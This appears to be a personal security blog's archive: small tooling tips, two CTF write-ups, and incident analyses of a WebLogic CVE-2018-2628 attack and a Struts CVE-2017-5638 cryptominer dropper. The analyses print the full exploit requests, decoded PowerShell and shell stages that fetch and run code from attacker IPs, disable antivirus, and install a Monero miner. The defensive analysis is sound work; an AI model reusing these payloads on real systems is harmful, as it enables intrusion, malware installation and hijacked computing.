Author Archives: zam

Analyzing Phishing Email – Word XML File Analysis

Recently I’ve observed a phishing mail as below:
https://www.virustotal.com/#/file/cf027dd938f1a268f45f2ea786dc538ab47f35006fb12d0b64e0867bccf789c0/detection – clean

The file seems to be clean per VT. Interestingly, on details sections, found 2 URLs on OpenXML Doc Info.

To search for these URLs, first you’ll need to rename the Word doc file to compressed zip file. E.g. sample.doc to sample.zip.

Then, extract the zip file. The URLs can be found inside file document.xml.rels (~/sample_folder/word/_rels/):

Its may look simple if you know which & where the file to be look at.

I’m thinking; what if we can search for all the URL/hyperlink in the XML files content of the Word document, without actually having to open it one-by-one.

To do that, we’ll using zipdump, re-search (together with reextra) Python script tools by Didier Stevens:

  • zipdump
  • re-search
  • reextra
  • Download the Python scripts mentioned above in one place. Then, executed this command below:

    ./zipdump.py -D sample.zip | ./re-search.py -f -n url -u

    Command above will search the content of the zip file & extract/applied regex searching for URLs.
    As you can see below, these is all the URLs that contained in the Word doc:

    Check bulk IP for reverse DNS (rDNS)

    Recently I’ve encounter list of IPs that are related to CoinHive. So I want to check for these IPs DNS. We can do that by using dig command to perform reverse DNS (rDNS).

    Reverse DNS (rDNS) is a method of resolving an IP address into a domain name, just as the domain name system (DNS) resolves domain names into associated IP addresses.

    I found this script at this site:

    #!/bin/bash
    
    for item
        do
            domain=$(dig -x "$item"  +short)
            if [ -n "$domain"  ] ;
                then
                echo "$item" - "$domain"
            else
                echo "$item" result is NULL
            fi
        done
    

    Just save this code above in your Linux/*nix machine, and run this command as below:

    [email protected]:~# cat ip.txt | xargs bash reverse_dns

    The result should be like this:

    Import & export installed Cygwin packages

    Recently I’ve changed my workstation to new one. Previously I’ve installed bunch of Cygwin packages on my old workstation.

    So I thought; can I somehow migrate my installed Cygwin packages from my old workstation to new workstation?

    The answer is yes. Follow me along to this wonderful journey XD

    First you’ll need to save list of what you have installed on your Cygwin on old workstation.
    To do this, open the Cygwin terminal/console & run this command below:

    grep " 1$" /etc/setup/installed.db | awk '{printf "%s%s",sep,$1; sep=","} END{print ""}' > cygwin_packages.txt

    Its basically dump a list of installed Cygwin packages in your workstation & save it to text file with comma-separated.

    Next, go to your Cygwin home folder (commonly locate at “C:\cygwin64\home\“), open the “cygwin_packages.txt” file that we save before & copy all the content inside the text file.

    Next, at your new workstation, ensure you have downloaded the latest Cygwin installer “setup-x86.exe” (32-bit) or “setup-x86_64.exe” (64-bit).

    Then, open your Windows cmd & change you directory to where you save the Cygwin installer. E.g. for my case here, I save it in my Downloads folder “C:\Users\Zam\Downloads>”.

    Then, run this command below on your Windows cmd; replacing/inserting the content of cygwin_packages.txt inside the double-quote as below:

    setup-x86.exe -q -P "<paste the cygwin_packages.txt content here>"

    You should see the Cygwin GUI opened & UAC requesting permission pop-up:

    Click “Yes”, go through “Next” button & wait until the installation finished.

    Analyzing Oracle WebLogic attack

    Recently we received an alert from our WAF related to an attack towards out environment.
    Further review of the alert found that the attacker is using Oracle WebLogic RCE Deserialization Vulnerability (CVE-2018-2628).

    We observed that the attacker included some sort of PowerShell command in their request:

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java version="1.8.0_131" class="java.beans.XMLDecoder">
    <void class="java.lang.ProcessBuilder">
      <array class="java.lang.String" length="3">
        <void index="0">
          <string>cmd.exe</string>
        </void>
        <void index="1">
          <string>/c</string>
        </void>
        <void index="2">
          <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
        </void>
      </array>
        <void method="start"/>
    </void>
    </java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
    </soapenv:Envelope>

    Seems like the PowerShell command is using Base64 encoding for obfuscation.
    I use https://gchq.github.io/CyberChef/ to decode the Base64:

    $OS=(GWmi Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers['User-Agent']=&quot;PowerShell/WL+ $OS&quot;;IEX $WC.DownloadString('http://111.230.229.226/images/test/DL.php');

    Seems like it tried to fetch DL.php file at http://111.230.229.226/images/test/DL.php.
    Lets try grab that file:

    [email protected]:~# wget http://111.230.229.226/images/test/DL.php
    --2018-04-29 19:50:27--  http://111.230.229.226/images/test/DL.php
    Connecting to 111.230.229.226:80... connected.
    HTTP request sent, awaiting response... 404 Not Found
    2018-04-29 19:50:28 ERROR 404: Not Found.

    Hmm.. Error 404..? Is it true error?
    Or did we missing something here?

    Lets analyze the command carefully:

    PS C:\Users\Fossil\Desktop> $OS=(GWmi Win32_OperatingSystem).Caption;
    PS C:\Users\Fossil\Desktop> $WC=New-Object Net.WebClient;
    PS C:\Users\Fossil\Desktop> $WC.Headers['User-Agent']="PowerShell/WL+ $OS";
    PS C:\Users\Fossil\Desktop>
    PS C:\Users\Fossil\Desktop> echo $OS;
    Microsoft Windows 7 Ultimate
    PS C:\Users\Fossil\Desktop> echo $WC.Headers['User-Agent'];
    PowerShell/WL+ Microsoft Windows 7 Ultimate

    We can see the attacker is assigning/using specific User-Agent when fetching the file.
    That’s why when we try to wget/curl the file directly, it failed.

    So what we have to do is we set the User-Agent exactly same when fetching the file.
    In this case, I’m using curl to fetch the file:

    [email protected]:~# curl -v -H User-Agent: "PowerShell/WL Microsoft Windows 7 Professional" http://111.230.229.226/images/test/DL.php
    *   Trying 111.230.229.226...
    * Connected to 111.230.229.226 (111.230.229.226) port 80 (#0)
    > GET /images/test/DL.php HTTP/1.1
    > Host: 111.230.229.226
    > Accept: */*
    > User-Agent: PowerShell/WL Microsoft Windows 7 Professional
    <
    < HTTP/1.1 200 OK
    < Date: Sun, 29 Apr 2018 11:50:23 GMT
    < Server: Apache/2.2.21 (Win32) PHP/5.3.10
    < X-Powered-By: PHP/5.3.10
    < Content-Length: 2539
    < Content-Type: text/html
    <
    $EncodedCompressedFile = '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';$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress);$UncompressedFileBytes = New-Object Byte[](3948);$Null=$DeflatedStream.Read($UncompressedFileBytes, 0, 3948);([Text.Encoding]::ASCII.GetString($UncompressedFileBytes)) | IEX;

    Now see? Previously if the fetch the file without the User-Agent, it will failed/error 404.
    Again, we see another set off Base64 encoding here.

    But what is it?
    I’m not an expert to explain this, but TL;DR, it convert Base64 encoded string to a memory stream and executes it. I guess ¯_(ツ)_/¯

    So, to see what happen if this command executes, we can use this Python script below to decode it.
    With this script, we can basically see what are those Base64 are doing.

    Take the Base64 at above, paste it at encoded parameters as example below:

    #!/usr/bin/python
    import base64
    import zlib
    
    encoded = "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"
    
    # [Convert]::FromBase64String
    decoded = base64.b64decode(encoded)
    
    # IO.Compression.DeflateStream
    # 15 is the default parameter, negative makes it ignore the gzip header
    decompressed = zlib.decompress(decoded, -15)
    
    print decompressed

    Save the script and run the Python script as command below:

    C:\Users\Fossil\Desktop>python decodeb64.py > output_DL_php.txt

    This will save all the output from your CMD to text file for easier to ready.
    P/S : Your can rename output_DL_php.txt to any filename that you want.

    Let’s see whats inside the text file:

    $MutexName = 'Global\20180419'
    $bCreated = $Flase
    $hMutex = New-Object System.Threading.Mutex($true,$MutexName,[Ref]$bCreated)
    if ($bCreated)
    {
            Start-Sleep 180
            $hMutex.ReleaseMutex()
    }
    else
    {
            Exit
    }
    
    
    #Update
    $WmiName = 'root\cimv2:PowerShell_Command'
    $mPId=$Null;$mPId = ([WmiClass] $WmiName).Properties['mPId'].Value
    if ($mPId -ne $Null) {
            Write-Host "[i] Old PId: $mPId"
            Get-Process -Id $mPId -ErrorAction SilentlyContinue | Stop-Process -Force
    }
    $WmiName = 'root\default:PowerShell_Command'
    $mPId=$Null;$mPId = ([WmiClass] $WmiName).Properties['mPId'].Value
    if ($mPId -ne $Null) {
            Write-Host "[i] Old PId: $mPId"
            Get-Process -Id $mPId -ErrorAction SilentlyContinue | Stop-Process -Force
    }
    
    
    $SrvName = "ZhuDongFangYu", "NisSrv","MsMpSvc","WdNisSvc","WinDefend", "MBAMService","a2AntiMalware"
    foreach ($Srv in $SrvName)
    {
    #       Set-Service -Name $Srv -StartupType Disabled -ErrorAction SilentlyContinue
    #       Stop-Service -Name $Srv -Force -ErrorAction SilentlyContinue
            $Null = SC.exe Config $Srv Start= Disabled
            $Null = SC.exe Stop $Srv
    }
    $ProName = "ZhuDongFangYu", "MsMpEng","MpCmdRun","msseces","NisSrv","MSASCui", "mbamtray","mbamservice","a2service"
    foreach ($Pro in $ProName)
    {
            Get-Process -Name $Pro -ErrorAction SilentlyContinue | Stop-Process -Force
    }
    
    $Null = Reg.exe Add "HKLM\SoftWare\Microsoft\Windows Defender\SpyNet" /v "SpyNetReporting" /t REG_DWORD /d 0 /f
    $Null = Reg.exe Add "HKLM\SoftWare\Microsoft\Windows Defender\Exclusions\Paths" /v "$Env:WinDir" /t REG_DWORD /d 0 /f
    $Null = Reg.exe Add "HKLM\SoftWare\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    $Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\NisSrv /v Start /t REG_DWORD /d 4 /f
    $Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\MsMpSvc /v Start /t REG_DWORD /d 4 /f
    $Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
    $Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
    
    
    $Script = "Start-Sleep (Get-Random -Min 60 -Max 300);IEX (New-Object Net.WebClient).DownloadString('http://111.230.229.226/images/def/DL.ps1');";
    $ScriptBytes = [System.Text.Encoding]::Unicode.GetBytes($Script);
    $EncodedScript = [System.Convert]::ToBase64String($ScriptBytes);
    
    $Path = "$Env:SystemRoot\System32\WindowsPowerShell\v1.0\PowerShell.exe"
    $Argv = "-NoP -NonI -EP ByPass -W Hidden -E $EncodedScript"
    $Process = Start-Process -FilePath $Path -ArgumentList $Argv -WindowStyle Hidden -PassThru
    $ProcessId = $($Process.Id)
    if ($ProcessId -ne $Null)
    {
            Write-Host "[+] Neutrino PS Process Id is $ProcessId"
    }
    else
    {
            Write-Host "[-] Neutrino PS Process Id is NULL"
    }
    
    
    #Downloader
    $x86 = "http://111.230.229.226/images/test/x86.exe"
    $x64 = "http://111.230.229.226/images/test/x64.exe"
    $File = "$Env:WinDir\Temp\lsass.eXe"
    $WC = New-Object System.Net.WebClient
    
    
    $Dir = "$Env:WinDir\Temp";
    if (!(Test-Path $Dir)){ New-Item $Dir -Type Directory; }
    if (!((Get-Item $File -Force) -is [IO.FileInfo])) { Remove-Item $File -Force -ErrorAction SilentlyContinue }
    
    
    $OS = (Get-WmiObject Win32_ComputerSystem).SystemType
    $SO = (Get-WmiObject Win32_OperatingSystem).OSArchitecture
    if (($OS -Match '64') -Or ($SO -Match '64'))
    {
            Write-Host "[i] OS 64-bit"
            $WC.DownloadFile($x64, $File)
            if ((Test-Path $File) -eq $False)
            {
                    $WC.DownloadFile("http://111.230.229.226/images/test/x64_VMP.exe", $File)
            }
    }
    else
    {
            Write-Host '[i] OS 32-bit'
            $WC.DownloadFile($x86, $File)
            if ((Test-Path $File) -eq $False)
            {
                    $WC.DownloadFile("http://111.230.229.226/images/test/x86_VMP.exe", $File)
            }
    }
    
    if (Test-Path $File)
    {
            Write-Host '[+] Downloaded'
            $Null = NetSH Firewall Add AllowedProgram $File "Windows Update" Enable
            IEX $WC.DownloadString('http://111.230.229.226/images/test/WMI.ps1')
    }
    else
    {
            Write-Host '[-] Fail To Download'
    }

    As you can see, the command is doing bunch of stuff that I’m lazy to explain 😉
    Hope you enjoy reading this.

    IOCs:

    017eba5231a63782bdd1d7c8beff5b0b *DL.php
    bee2f2223729166c264037a82fa4fed3 *DL.ps1
    b5065178c574936a1b7e477929ba1075 *lsass.eXe
    1dd6bc7549913b64595540bc77059415 *Neutrino.ps1
    dfcb19949d55d35e5d3f1dd569218ce4 *WMI.ps1
    ec5e6097038be59e7311f9de8d6354d6 *x64.exe
    35cb2b208085bcb5b93ea6420f01c92b *x64_VMP.exe
    2129a8287215558e5870c7cc89d0a8fe *x86.exe
    c11dbd4777d6ec2b434c424e201c0e6b *x86_VMP.exe

    References:
    https://gist.githubusercontent.com/strazzere/5faa709a3db9e1dcf3b5/raw/42b98a918bac3725934bcfa3087ac5936d9b88d1/decrypt.py
    http://threat.tevora.com/5-minute-forensics-decoding-powershell-payloads/

    Wargames 2017 – Challenge 12 : ezfile sharing

    Challenge 12 : ezfile sharing

    question for challenge 12

    and the hint for this challenge:

    hint for challenge 12

    one of our teammate was fuzzing around the website and found “.git” folder.
    seems related to the hint.
    we try to browse the folder/path:

    .git folder/path

    as a “layman” person (please guys, don’t try this at home. or any other place. wkwkwkwk), I’ve gone too far by downloading all the git folder (recursively):

    download all git folder content

    lets see what git -help can provide us with info:

    git help menu

    hmm.. lets see if “git show” can provide any clue…

    and.. profit! XD

    so the flag is: “wgmy:{AdminGitGudPlease}”

    Wargames 2017 – Challenge 9 : unreachable

    the question is:

    "The critical server seems unreachable. The sysadmin tries to identify the cause of it..but weird..he is doing it backwardly."
    http://files.wargames.my/2/p100.7zv
    question for challenge 2

    question for challenge 2

    and the hint given to us:

    hint for challenge 2

    hint for challenge 2

    so… RFC 792 – something related to ICMP/ping yada yada
    so we open the pcap file in Wireshark, view only ICMP protocol:

    open pcap using wireshark & then filter ICMP only

    we can see ICMP traffic involving 2 IPs; 192.168.1.8 & 192.168.1.10
    after digging around, I find out there is some “unique differences” at ping identification number; offset 0010. this involving IP 192.168.1.8.

    lets use tshark to see it clearly:

    tshark -r pcap1-100_1_copy.pcapng -x 'icmp and ip.src==192.168.1.8' | grep 0010

    use tshark & grep offset 0010

    as noted in the hint above;
    “he is tracing backwardly.”

    the flag is: flag_is_p!ngp0ng~
    but actually…. the flag is: p!ngp0ng~

    Shell hiding in image files

    One day, we noticed strange GET request towards our JBoss server:

    GET /login.action   HTTP/1.1
    Host: X.X.X.X
    Connection: keep-alive 
    Accept-Encoding: gzip, deflate 
    Accept: */* 
    User-Agent: Mozilla/5.0 
    Content-Type: %{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "48 * * * * wget -O - -q http://91.230.47.41/pics/logo.jpg|sh\n18 * * * * curl http://91.230.47.41/pics/logo.jpg|sh" | crontab -').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())} 

    From the request above, you’ll quickly noticed that this attack leveraging Apache Struts vulnerability from CVE-2017-5638.

    The request tried to execute command below:

    #cmd='echo "48 * * * * wget -O - -q http://91.230.47.41/pics/logo.jpg|sh\n18 * * * * curl http://91.230.47.41/pics/logo.jpg|sh" | crontab -'

    “-O” : writes the documents to file.
    “-” : if is used as file, documents will be printed to standard output, disabling link conversion.
    “-q” : quiet (no output)

    As you see, it tried to fetch image (jpeg file) from 91.230.47.41. Seems normal right?
    We fetch the file & take a look at the jpg file:

    [email protected]:~/a# file logo.jpg
    logo.jpg: POSIX shell script, ASCII text executable

    ASCII?? Not JPEG?? hmm..
    Here’s whats inside the “logo.jpg” file:

    [email protected]:~/a# cat logo.jpg
    #!/bin/sh
    rm -rf /tmp/systemd-logind
    rm -rf /tmp/logind.conf
    rm -rf /tmp/kworker
    rm -rf /tmp/kworker.conf
    rm -rf /tmp/kauditd.conf
    pkill -f stratum
    pkill -f "/tmp/apache"
    pkill -f "/tmp/httpd.conf"
    pkill -f cryptonight
    pkill -f qivtpwwuxs
    ps auxf|grep -v grep|grep -v smzgmilpdo|grep "/tmp/"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "qivtpwwuxs"|awk '{print $2}'|xargs kill -9
    ps -fe|grep smzgmilpdo|grep -v grep
    if [ $? -ne 0 ]
    then
    echo "start process....."
    chmod 777 /tmp/smzgmilpdo.conf
    rm -rf /tmp/smzgmilpdo.conf
    curl -o /tmp/smzgmilpdo.conf http://91.230.47.41/pics/kworker.conf
    wget -O /tmp/smzgmilpdo.conf http://91.230.47.41/pics/kworker.conf
    chmod 777 /tmp/kauditd
    rm -rf /tmp/kauditd
    cat /proc/cpuinfo|grep aes>/dev/null
    if [ $? -ne 1 ]
    then
    curl -o /tmp/kauditd http://91.230.47.41/pics/kworker
    wget -O /tmp/kauditd http://91.230.47.41/pics/kworker
    else
    curl -o /tmp/kauditd http://91.230.47.41/pics/kworker_na
    wget -O /tmp/kauditd http://91.230.47.41/pics/kworker_na
    fi
    chmod +x /tmp/kauditd
    cd /tmp
    proc=`grep -c ^processor /proc/cpuinfo`
    cores=$((($proc+1)/2))
    nohup ./kauditd -c smzgmilpdo.conf -t `echo $cores` >/dev/null &
    else
    echo "runing....."
    fi

    We noticed there are several other file fetched; possibly a config file & bin file.
    Let’s fetch those file!

    Here is the config file:
    http://91.230.47.41/pics/kworker.conf

    {{
        "url" : "stratum+tcp://212.129.44.157:80",
        "url" : "stratum+tcp://212.129.46.87:80",
        "url" : "stratum+tcp://212.129.44.156:80",
        "url" : "stratum+tcp://212.129.46.191:80",
        "url" : "stratum+tcp://62.210.29.108:80",
        "url" : "stratum+tcp://212.83.129.195:80",
        "url" : "stratum+tcp://212.129.44.155:80",
        "user" : "466iRjZzJZZWAqzV24ywY8XMVNkp9hj8UJiBEf61Eui6Nw8bEAJ1z434LWM3SKdaDyH7zgNY64rgg2fYmw8cbP5uBjpMA8g",
        "pass" : "x",
        "algo" : "cryptonight",
        "quiet" : true
    }

    Not sure it is. Maybe bin file to run a process:
    http://91.230.47.41/pics/kworker

    [email protected]:~/91.230.47.41# file kworker
    kworker: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped

    Lets see if the file is packed:

    [email protected]:~/91.230.47.41# upx -l kworker
                           Ultimate Packer for eXecutables
                              Copyright (C) 1996 - 2011
    UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011
    
            File size         Ratio      Format      Name
       --------------------   ------   -----------   -----------
       2979640 ->   1217152   40.85%  linux/ElfAMD   kworker

    Yup. So lets unpacked the file using UPX:

    [email protected]:~/91.230.47.41# upx -d kworker
                           Ultimate Packer for eXecutables
                              Copyright (C) 1996 - 2011
    UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011
    
            File size         Ratio      Format      Name
       --------------------   ------   -----------   -----------
       2980813 <-   1217152   40.83%  linux/ElfAMD   kworker
    
    Unpacked 1 file.
    
    [email protected]:~/91.230.47.41# upx -l kworker
                           Ultimate Packer for eXecutables
                              Copyright (C) 1996 - 2011
    UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011
    
            File size         Ratio      Format      Name
       --------------------   ------   -----------   -----------
    upx: kworker1: NotPackedException: not packed by UPX

    http://91.230.47.41/pics/kworker_na

    [email protected]:~/91.230.47.41# file kworker_na
    kworker_na: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=0x0eedc33c49aeb80818a839a9b23cf159c710e443, stripped
    
    [email protected]:~/91.230.47.41# upx -l kworker_na
                           Ultimate Packer for eXecutables
                              Copyright (C) 1996 - 2011
    UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011
    
            File size         Ratio      Format      Name
       --------------------   ------   -----------   -----------
    upx: kworker_na: NotPackedException: not packed by UPX

    Overall, looks like the attacker want to hack our servers & turn it into his own crypto currency mining machine.
    Typical behavior of attack we see in this time where the crypto currency is rising. People hack to make profit. 🙂

    Here the MD5 for file above:

    211e98ac0686fe98d06570ad0689e9b3  logo.jpg
    d2a01b844521fb141b8449f4d8e1c821  kworker.conf
